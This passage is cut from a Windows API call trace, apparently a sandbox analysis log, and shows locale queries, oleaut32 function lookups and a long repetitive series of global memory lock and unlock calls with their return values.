lpLCData="Jan") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd74, cchData=256 | out: lpLCData="January") returned 8 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Feb") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd74, cchData=256 | out: lpLCData="February") returned 9 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mar") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="March") returned 6 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Apr") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="April") returned 6 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jun") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="June") returned 5 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jul") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="July") returned 5 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Aug") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="August") returned 7 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd74, cchData=256 | out: 
lpLCData="Sep") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd74, cchData=256 | out: lpLCData="September") returned 10 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Oct") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd74, cchData=256 | out: lpLCData="October") returned 8 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Nov") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd74, cchData=256 | out: lpLCData="November") returned 9 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Dec") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd74, cchData=256 | out: lpLCData="December") returned 9 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sun") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sunday") returned 7 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mon") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Monday") returned 7 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tue") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tuesday") returned 8 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wed") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wednesday") returned 10 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd74, cchData=256 
| out: lpLCData="Thu") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thursday") returned 9 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Fri") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Friday") returned 7 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sat") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Saturday") returned 9 [0060.202] GetThreadLocale () returned 0x409 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="$") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec8, cchData=2 | out: lpLCData=".") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="2") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec8, cchData=2 | out: lpLCData="/") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0060.202] GetThreadLocale () returned 0x409 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0060.203] 
GetThreadLocale () returned 0x409 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec8, cchData=2 | out: lpLCData=":") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="AM") returned 3 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="PM") returned 3 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0060.203] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff24 | out: lpPerformanceCount=0x18ff24*=18055807900) returned 1 [0060.204] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") 
returned 0x76ebf15e [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0060.207] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.207] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.208] GlobalUnlock (hMem=0x450004) returned 0 [0060.208] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.208] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.208] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.208] GlobalUnlock (hMem=0x450004) returned 0 [0060.208] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.208] GlobalUnlock (hMem=0x45000c) returned 0 [0060.209] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.209] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.209] GlobalUnlock (hMem=0x45000c) returned 0 [0060.209] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.209] GlobalLock (hMem=0x450004) returned 0x570678 
[0060.210] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.210] GlobalUnlock (hMem=0x45000c) returned 0 [0060.210] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.210] GlobalUnlock (hMem=0x450004) returned 0 [0060.210] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.210] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.210] GlobalUnlock (hMem=0x450004) returned 0 [0060.210] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.210] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.210] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.210] GlobalUnlock (hMem=0x450004) returned 0 [0060.210] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.210] GlobalUnlock (hMem=0x45000c) returned 0 [0060.210] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.210] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.210] GlobalUnlock (hMem=0x45000c) returned 0 [0060.210] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.211] GlobalLock (hMem=0x450004) returned 0x570678 [0060.211] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.211] GlobalUnlock (hMem=0x45000c) returned 0 [0060.211] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.211] GlobalUnlock (hMem=0x450004) returned 0 [0060.211] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.211] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.211] GlobalUnlock (hMem=0x450004) returned 0 [0060.211] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.211] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.211] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.211] GlobalUnlock (hMem=0x450004) returned 0 [0060.211] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.211] GlobalUnlock (hMem=0x45000c) returned 0 [0060.211] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.211] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.211] GlobalUnlock (hMem=0x45000c) returned 0 [0060.211] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.212] GlobalLock (hMem=0x450004) returned 0x570678 [0060.212] 
GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.212] GlobalUnlock (hMem=0x45000c) returned 0 [0060.212] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.212] GlobalUnlock (hMem=0x450004) returned 0 [0060.212] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.212] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.212] GlobalUnlock (hMem=0x450004) returned 0 [0060.212] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.212] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.212] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.212] GlobalUnlock (hMem=0x450004) returned 0 [0060.212] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.212] GlobalUnlock (hMem=0x45000c) returned 0 [0060.212] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.212] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.212] GlobalUnlock (hMem=0x45000c) returned 0 [0060.212] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.213] GlobalLock (hMem=0x450004) returned 0x570678 [0060.213] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.213] GlobalUnlock (hMem=0x45000c) returned 0 [0060.213] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.213] GlobalUnlock (hMem=0x450004) returned 0 [0060.213] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.213] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.213] GlobalUnlock (hMem=0x450004) returned 0 [0060.213] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.213] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.213] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.213] GlobalUnlock (hMem=0x450004) returned 0 [0060.213] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.213] GlobalUnlock (hMem=0x45000c) returned 0 [0060.213] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.213] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.213] GlobalUnlock (hMem=0x45000c) returned 0 [0060.214] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.214] GlobalLock (hMem=0x450004) returned 0x570678 [0060.214] GlobalHandle 
(pMem=0x570678) returned 0x450004 [0060.214] GlobalUnlock (hMem=0x450004) returned 0 [0060.214] GlobalReAlloc (hMem=0x450004, dwBytes=0x10, uFlags=0x2) returned 0x450004 [0060.214] GlobalLock (hMem=0x450004) returned 0x570678 [0060.214] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.214] GlobalUnlock (hMem=0x45000c) returned 0 [0060.214] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.214] GlobalUnlock (hMem=0x450004) returned 0 [0060.214] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.214] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.214] GlobalUnlock (hMem=0x450004) returned 0 [0060.214] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.214] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.214] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.214] GlobalUnlock (hMem=0x450004) returned 0 [0060.214] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.215] GlobalUnlock (hMem=0x45000c) returned 0 [0060.215] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.215] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.215] GlobalUnlock (hMem=0x45000c) returned 0 [0060.215] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.215] GlobalLock (hMem=0x450004) returned 0x570678 [0060.215] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.215] GlobalUnlock (hMem=0x45000c) returned 0 [0060.215] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.215] GlobalUnlock (hMem=0x450004) returned 0 [0060.215] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.215] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.215] GlobalUnlock (hMem=0x450004) returned 0 [0060.215] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.215] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.215] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.215] GlobalUnlock (hMem=0x450004) returned 0 [0060.216] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.216] GlobalUnlock (hMem=0x45000c) returned 0 [0060.216] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.216] 
GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.216] GlobalUnlock (hMem=0x45000c) returned 0 [0060.216] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.216] GlobalLock (hMem=0x450004) returned 0x570678 [0060.216] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.216] GlobalUnlock (hMem=0x45000c) returned 0 [0060.216] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.216] GlobalUnlock (hMem=0x450004) returned 0 [0060.216] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.216] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.216] GlobalUnlock (hMem=0x450004) returned 0 [0060.216] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.216] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.216] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.216] GlobalUnlock (hMem=0x450004) returned 0 [0060.217] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.217] GlobalUnlock (hMem=0x45000c) returned 0 [0060.217] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.217] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.217] GlobalUnlock (hMem=0x45000c) returned 0 [0060.217] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.217] GlobalLock (hMem=0x450004) returned 0x570678 [0060.217] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.217] GlobalUnlock (hMem=0x45000c) returned 0 [0060.217] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.217] GlobalUnlock (hMem=0x450004) returned 0 [0060.217] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.217] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.217] GlobalUnlock (hMem=0x450004) returned 0 [0060.217] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.217] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.217] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.218] GlobalUnlock (hMem=0x450004) returned 0 [0060.218] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.218] GlobalUnlock (hMem=0x45000c) returned 0 [0060.218] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.218] GlobalHandle 
(pMem=0x56e668) returned 0x45000c [0060.218] GlobalUnlock (hMem=0x45000c) returned 0 [0060.218] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.218] GlobalLock (hMem=0x450004) returned 0x570678 [0060.218] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.218] GlobalUnlock (hMem=0x45000c) returned 0 [0060.218] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.218] GlobalUnlock (hMem=0x450004) returned 0 [0060.218] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.218] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.219] GlobalUnlock (hMem=0x450004) returned 0 [0060.219] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.219] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.219] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.219] GlobalUnlock (hMem=0x450004) returned 0 [0060.219] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.219] GlobalUnlock (hMem=0x45000c) returned 0 [0060.219] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.219] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.219] GlobalUnlock (hMem=0x45000c) returned 0 [0060.219] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.219] GlobalLock (hMem=0x450004) returned 0x570678 [0060.219] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.219] GlobalUnlock (hMem=0x45000c) returned 0 [0060.219] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.219] GlobalUnlock (hMem=0x450004) returned 0 [0060.220] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.220] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.220] GlobalUnlock (hMem=0x450004) returned 0 [0060.220] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.220] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.220] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.220] GlobalUnlock (hMem=0x450004) returned 0 [0060.220] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.220] GlobalUnlock (hMem=0x45000c) returned 0 [0060.220] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.220] GlobalHandle (pMem=0x56e668) 
returned 0x45000c [0060.220] GlobalUnlock (hMem=0x45000c) returned 0 [0060.220] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.220] GlobalLock (hMem=0x450004) returned 0x570678 [0060.220] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.220] GlobalUnlock (hMem=0x45000c) returned 0 [0060.220] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.220] GlobalUnlock (hMem=0x450004) returned 0 [0060.221] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.221] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.221] GlobalUnlock (hMem=0x450004) returned 0 [0060.221] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.221] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.221] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.221] GlobalUnlock (hMem=0x450004) returned 0 [0060.221] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.221] GlobalUnlock (hMem=0x45000c) returned 0 [0060.221] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.221] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.221] GlobalUnlock (hMem=0x45000c) returned 0 [0060.221] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.221] GlobalLock (hMem=0x450004) returned 0x570678 [0060.223] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.223] GlobalUnlock (hMem=0x45000c) returned 0 [0060.223] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.223] GlobalUnlock (hMem=0x450004) returned 0 [0060.223] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.223] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.224] GlobalUnlock (hMem=0x450004) returned 0 [0060.224] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.224] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.224] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.224] GlobalUnlock (hMem=0x450004) returned 0 [0060.224] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.224] GlobalUnlock (hMem=0x45000c) returned 0 [0060.224] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.224] GlobalHandle (pMem=0x56e668) returned 0x45000c 
[0060.224] GlobalUnlock (hMem=0x45000c) returned 0 [0060.224] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.224] GlobalLock (hMem=0x450004) returned 0x570678 [0060.224] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.224] GlobalUnlock (hMem=0x45000c) returned 0 [0060.224] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.225] GlobalUnlock (hMem=0x450004) returned 0 [0060.225] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.225] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.225] GlobalUnlock (hMem=0x450004) returned 0 [0060.225] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.225] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.225] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.225] GlobalUnlock (hMem=0x450004) returned 0 [0060.225] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.225] GlobalUnlock (hMem=0x45000c) returned 0 [0060.225] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.225] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.225] GlobalUnlock (hMem=0x45000c) returned 0 [0060.225] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.225] GlobalLock (hMem=0x450004) returned 0x570678 [0060.225] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.225] GlobalUnlock (hMem=0x45000c) returned 0 [0060.226] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.226] GlobalUnlock (hMem=0x450004) returned 0 [0060.226] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.226] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.226] GlobalUnlock (hMem=0x450004) returned 0 [0060.226] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.226] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.226] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.226] GlobalUnlock (hMem=0x450004) returned 0 [0060.226] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.226] GlobalUnlock (hMem=0x45000c) returned 0 [0060.226] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.226] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.226] 
GlobalUnlock (hMem=0x45000c) returned 0 [0060.226] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.227] GlobalLock (hMem=0x450004) returned 0x570678 [0060.227] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.227] GlobalUnlock (hMem=0x45000c) returned 0 [0060.227] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.227] GlobalUnlock (hMem=0x450004) returned 0 [0060.227] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.227] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.227] GlobalUnlock (hMem=0x450004) returned 0 [0060.227] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.227] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.227] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.227] GlobalUnlock (hMem=0x450004) returned 0 [0060.227] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.227] GlobalUnlock (hMem=0x45000c) returned 0 [0060.227] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.227] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.227] GlobalUnlock (hMem=0x45000c) returned 0 [0060.228] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.228] GlobalLock (hMem=0x450004) returned 0x570678 [0060.228] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.228] GlobalUnlock (hMem=0x45000c) returned 0 [0060.228] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.228] GlobalUnlock (hMem=0x450004) returned 0 [0060.228] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.228] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.228] GlobalUnlock (hMem=0x450004) returned 0 [0060.228] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.228] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.228] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.228] GlobalUnlock (hMem=0x450004) returned 0 [0060.228] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.228] GlobalUnlock (hMem=0x45000c) returned 0 [0060.228] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.228] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.228] GlobalUnlock 
